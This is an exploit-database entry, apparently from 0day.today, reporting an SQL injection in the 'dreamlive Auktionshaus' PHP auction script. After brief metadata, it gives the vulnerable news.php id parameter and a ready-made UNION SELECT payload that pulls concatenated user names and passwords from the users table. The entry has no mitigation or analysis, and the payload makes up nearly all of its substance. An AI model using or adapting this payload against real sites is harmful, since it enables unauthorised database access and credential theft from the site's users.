dreamlive Auktionshaus script news.php (id) SQL Injection Vulnerability

2010-03-12T00:00:00
ID 1337DAY-ID-9623
Type zdt
Reporter Easy Laster
Modified 2010-03-12T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =======================================================================
dreamlive Auktionshaus script news.php (id) SQL Injection Vulnerability
=======================================================================

----------------------------Information------------------------------------------------
+Name : dreamlive Auktionshaus script news.php (id) SQL Injection
+Autor : Easy Laster
+Date   : 12.03.2010
+Script  : dreamlive Auktionshaus script
+Language :PHP
+Discovered by Easy Laster

----------------------------------------------------------------------------------------
+Vulnerability : http://server/auktionshaus/news.php?id=
+Exploitable   : http://server/auktionshaus/news.php?id=999999+union+select+1,2,
concat(name,0x3a,password),4,5+from+users+where+id=1--
-----------------------------------------------------------------------------------------



#  0day.today [2018-02-19]  #